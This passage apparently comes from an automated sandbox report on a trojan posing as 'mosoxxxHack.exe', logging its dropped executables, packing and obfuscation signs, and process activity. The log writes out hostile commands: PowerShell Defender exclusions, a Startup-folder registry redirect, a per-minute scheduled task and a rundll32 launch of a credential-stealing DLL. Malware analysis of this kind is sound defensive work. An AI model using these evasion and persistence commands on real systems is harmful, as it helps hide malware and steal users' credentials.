Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_02FD0ACA	26_2_02FD0ACA
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_02FD3154	26_2_02FD3154
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_02FD0478	26_2_02FD0478
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_02FD0469	26_2_02FD0469
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_05729E54	26_2_05729E54
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_057285B0	26_2_057285B0
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_0572CDE1	26_2_0572CDE1
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_0586202C	26_2_0586202C

Source: mosoxxxHack.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: a.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: a.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: drbux.exe.25.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: drbux.exe.25.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: clp[1].exe0.32.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: clp[1].exe0.32.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: mscorjit.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Section loaded: mscorjit.dll			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\

Source: mosoxxxHack.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: String function: 0040F400 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: String function: 00410AC0 appears 39 times

Source: mosoxxxHack.exe	Binary or memory string: OriginalFilename vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.373452548.00000000080B0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.373452548.00000000080B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.372761221.0000000007C10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.356061745.0000000000461000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameMinifying.exe4 vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.372106486.00000000076C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.370415619.0000000006140000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.373155280.0000000007FB0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNamespaceResolverForIntrospecti.exe2 vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.372786827.0000000007C20000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.361979737.0000000002E00000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename_.dll4 vs mosoxxxHack.exe
Source: mosoxxxHack.exe, 00000001.00000002.371947560.0000000007470000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameaspnet_rc.dllT vs mosoxxxHack.exe

Source: a.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: drbux.exe.25.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: clp[1].exe0.32.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: mosoxxxHack.exe	Static PE information: Section: ZLIB complexity 1.0004385521
Source: mosoxxxHack.exe	Static PE information: Section: ZLIB complexity 0.996106823304
Source: mosoxxxHack.exe	Static PE information: Section: ZLIB complexity 1.00635470826
Source: mosoxxxHack.exe	Static PE information: Section: ZLIB complexity 0.997375583204

Source: C:\Users\user\Desktop\mosoxxxHack.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/36@6/3

Source: C:\Users\user\Desktop\mosoxxxHack.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: mosoxxxHack.exe

ReversingLabs: Detection: 43%

Source: C:\Users\user\Desktop\mosoxxxHack.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\mosoxxxHack.exe 'C:\Users\user\Desktop\mosoxxxHack.exe'
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe 'C:\Users\user\AppData\Local\Temp\a.exe'
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe C:\Users\user\AppData\Local\Temp\a.exe
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN drbux.exe /TR 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe' /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ca82a716069a53\cred.dll, Main
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Users\user\AppData\Local\Temp\clp.exe 'C:\Users\user\AppData\Local\Temp\clp.exe'
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe 'C:\Users\user\AppData\Local\Temp\a.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe C:\Users\user\AppData\Local\Temp\a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN drbux.exe /TR 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe' /F
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ca82a716069a53\cred.dll, Main
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Users\user\AppData\Local\Temp\clp.exe 'C:\Users\user\AppData\Local\Temp\clp.exe'

Source: C:\Users\user\AppData\Local\Temp\a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\mosoxxxHack.exe

File created: C:\Users\user\AppData\Local\Temp\tmp3E00.tmp

Jump to behavior

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ca82a716069a53\cred.dll, Main

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Mutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01

Source: a.exe.1.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: a.exe.1.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: a.exe.1.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: drbux.exe.25.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: drbux.exe.25.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'
Source: drbux.exe.25.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\mosoxxxHack.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\a.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: mosoxxxHack.exe

Static file information: File size 2674196 > 1048576

Source: mosoxxxHack.exe

Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x22e600

Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: a.exe, drbux.exe, 0000001A.00000002.476412078.00000000041F1000.00000004.00000001.sdmp
Source:	Binary string: _.pdb source: mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: a.exe.1.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 17.2.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 17.0.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 25.0.a.exe.5f0000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 25.2.a.exe.5f0000.1.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 26.0.drbux.exe.d70000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 26.2.drbux.exe.d70000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: clp[1].exe0.32.dr, epK0KZUFaasIUKsyJ4/T7RBVOnrKBBxJtHYk6.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_00631052 push esp; iretd	17_2_00631053
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_00630945 push ebp; retf	17_2_00630947
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_00630F17 push ecx; ret	17_2_00630F1B
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00410B06 push ecx; ret	25_2_00410B19
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_0042CDF5 push esi; ret	25_2_0042CDFE
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00601052 push esp; iretd	25_2_00601053
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00600945 push ebp; retf	25_2_00600947
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00600F17 push ecx; ret	25_2_00600F1B
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_00D81052 push esp; iretd	26_2_00D81053
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_00D80945 push ebp; retf	26_2_00D80947
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_00D80F17 push ecx; ret	26_2_00D80F1B
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_0572E620 pushfd ; iretd	26_2_0572E629

Source: mosoxxxHack.exe	Static PE information: section name:
Source: mosoxxxHack.exe	Static PE information: section name:
Source: mosoxxxHack.exe	Static PE information: section name:
Source: mosoxxxHack.exe	Static PE information: section name:
Source: mosoxxxHack.exe	Static PE information: section name: .imports
Source: mosoxxxHack.exe	Static PE information: section name: .themida
Source: mosoxxxHack.exe	Static PE information: section name: .loadcon
Source: mosoxxxHack.exe	Static PE information: section name: .boot
Source: mosoxxxHack.exe	Static PE information: section name: .taggant

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: clp[1].exe0.32.dr	Static PE information: real checksum: 0x0 should be: 0x184ec0
Source: a.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x180841
Source: drbux.exe.25.dr	Static PE information: real checksum: 0x0 should be: 0x180841
Source: mosoxxxHack.exe	Static PE information: real checksum: 0x290699 should be: 0x29b4dd

Source: initial sample	Static PE information: section name: entropy: 7.97146444014
Source: initial sample	Static PE information: section name: .taggant entropy: 6.83025485277
Source: initial sample	Static PE information: section name: .text entropy: 7.85289741788
Source: initial sample	Static PE information: section name: .text entropy: 7.85289741788
Source: initial sample	Static PE information: section name: .text entropy: 7.83242856405

Source: a.exe.1.dr, HF_Cam/Form9.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jesEZBWgGT', 'h7Xa3VbFQC', 'wjLaz2jIVc', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'NtRVrxWa6o', 'yvMVjv47LW', 'V7O8a0oQsD'
Source: a.exe.1.dr, HF_Cam/Form7.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'm0EQumEgE8', 'qu6Nh1hjpW', 'P52NEs4n8U', 'WuS90DV8sg', 'eas9I3CJ33', 'GWsaMExoq6', 'wx0al1ua78', 'CKDaZFxMxJ'
Source: a.exe.1.dr, HF_Cam/Form3.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'ud0BmsGVq0', 'Qf9eJLxlnI', 'BcqebgEg3w', 'mTGeUO1gFS', 'sZue4ok0PI', 'vN8eKrrFeA', 'RdEexZ8DH2', 'qu6Nh1hjpW'
Source: a.exe.1.dr, HF_Cam/Form20.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nhRBq5U98b', 'SLqeyN94xg', 'mAveSVtKgW', 'Py4eTJ2g6C', 'WcSeD1GUea', 'dNXeh4Hmx2', 'uGpeEyDyo4', 'obMeM6TNTS'
Source: a.exe.1.dr, HF_Cam/Form1.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'HeMuoHnPNR', 'QhM9nPOODt', 'esS9A4MHL0', 'htU92PqaOQ', 'wuf9Lka2Ku', 'n6x9fOcaY0', 'e2w9CI68Ml', 'tR79G8PWVn'
Source: a.exe.1.dr, HF_Cam/Form14.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'VW7ShTVMtC', 'y1m6fMliOR', 'KD36CMLlKs', 'kau8qPxc2B', 'Qch8Rj6myf', 'hTR6GMfqIV', 'Nyc6o5Vhve', 'MDg6ulhUTT'
Source: a.exe.1.dr, HF_Cam/Form16.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'iZYslN1Ui9', 'qu6Nh1hjpW', 'P52NEs4n8U', 'fZuvnc1O5t', 'fC0vACbpen', 'gPmv2VT6hV', 'X0wvLtHqNi', 'aIpvfkOJUt'
Source: a.exe.1.dr, HF_Cam/frmEnvironment.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'QJJiKBO3n', 'dIjNeWQyFQ', 'Xp1NB5EEwe', 'fbqNQA2Znd', 'dqiNOvyEEt', 'OI2NaqTFsA', 'Ow1NVx3tsp', 'oFsNydyMTx'
Source: a.exe.1.dr, HF_Cam/Form15.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nvXlrxs5Jb', 'xlDvrUDjxT', 'LaHvjBpySC', 'VxDv7MUouc', 'wJVvFrY61F', 'V7O8a0oQsD', 'nST8VcLDsi', 'Mw368UbuhE'
Source: a.exe.1.dr, HF_Cam/Form19.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'OlZZ23UcMW', 'LRo666O7dq', 'YTs6vKiIcX', 'qu6Nh1hjpW', 'P52NEs4n8U', 'bdSvgi2Tcy', 'bnsvwKhuuo', 'XLivsloMOU'
Source: a.exe.1.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	High entropy of concatenated method names: '.cctor', 'A3Vd6mDfIxdn1', 'OLJqO2IArs', 'ErgqxYetMV', 'V1eqkrpc9W', 'sMAqCoBcch', 'AGNqhxio36', 'zaBqLcTSy7', 'yMWqdABfe6', 'cpUqKWc8Kl'
Source: a.exe.1.dr, HF_Cam/Form12.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jqZRG89nyo', 'xqYYcS6ugv', 'E4OYN1Ke2i', 'TT4Y9I9llj', 'MydYHxf2pO', 'V7O8a0oQsD', 'nST8VcLDsi', 'nHJY8cJbd9'
Source: a.exe.1.dr, HF_Cam/Form6.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jfKbqoTPyI', 'LVganV68OH', 'uqWaA4KE2P', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'o6Ea27U7lq', 'Pk5aLhekw2', 'RI88Wcxkxv'
Source: a.exe.1.dr, HF_Cam/Form11.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'E8UJAlSR48', 's4A8ZrtEcl', 'NxV855X5HV', 'WuS90DV8sg', 'eas9I3CJ33', 'RI88Wcxkxv', 'mNA8me0Lqi', 'V7O8a0oQsD'
Source: a.exe.1.dr, HF_Cam/Form18.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'yGbZa9dVdY', 'V7O8a0oQsD', 'nST8VcLDsi', 'etkvyfa3TD', 'kDRvSmYNJN', 'jBR8hKEAOq', 'fuQ8Exql4N', 'qu6Nh1hjpW'
Source: a.exe.1.dr, HF_Cam/Form8.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'a2XQ01sX3p', 'EQ6aK52YWA', 'Ch7axEP0Gb', 'Py4eTJ2g6C', 'WcSeD1GUea', 'SLqeyN94xg', 'mAveSVtKgW', 'wUtB6QGq6H'
Source: a.exe.1.dr, HF_Cam/Form10.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'M1gJFi1MPv', 't1F8eCv1Aq', 'NGZ8B4LYxu', 'RFc8QKfOnp', 'Ro08Oc63cC', 'V7O8a0oQsD', 'nST8VcLDsi', 'RDM8yGlyPQ'
Source: a.exe.1.dr, HF_Cam/frmHfCam.cs	High entropy of concatenated method names: '.ctor', 'SiKGp1RK7W', 'b18GgJPGTe', 'FMJGNwB1gv', 'YZrGmbULmN', 'RkXGUEhK7B', 'aThGwB7PbS', 'TB6G93JvTm', 'JinGYdZdIQ', 'v7hG32742p'
Source: a.exe.1.dr, HF_Cam/Form17.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'taBsKPFWOM', 'V7O8a0oQsD', 'nST8VcLDsi', 'CsxveFqWc8', 'vWJvBkp1jr', 'X50vQKlvmV', 'SaTvOw0Reg', 'qu6Nh1hjpW'
Source: a.exe.1.dr, HF_Cam/Form5.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'peb5xBDqZw', 'cKFQhattTg', 'bxcQENh0cv', 'lq9QMwJBAh', 'sh5QllDTbZ', 'SVSQZ40qlq', 'aBiQ54tM7m', 'IANQW6AtAx'
Source: a.exe.1.dr, HF_Cam/Form13.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'teoS1ZT4jC', 'EDg6rACw6u', 'sMm6jvD2LB', 'xX967iYkI7', 'nu76FVrNja', 'uOw6txwHvR', 'Fua61Q7kIf', 'Pcn6Xjtl20'
Source: a.exe.1.dr, HF_Cam/frmLineNumbering.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'CsY1sjPl5R', 'bpvTJ2F1Bm', 'ploTbML45e', 'Om5TUXw4FT', 'cfBT42fx85', 'yi8TKx96Ap', 'We6Tx90Old', 'p0ETgQRZE5'
Source: a.exe.1.dr, HF_Cam/Form4.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'DpPFNo4rb6', 'qu6Nh1hjpW', 'P52NEs4n8U', 't4lQ0V8JIM', 'VZ6QI0bnI2', 'XLivsloMOU', 'ifqvkquyKr', 'PM1e7tWw0S'
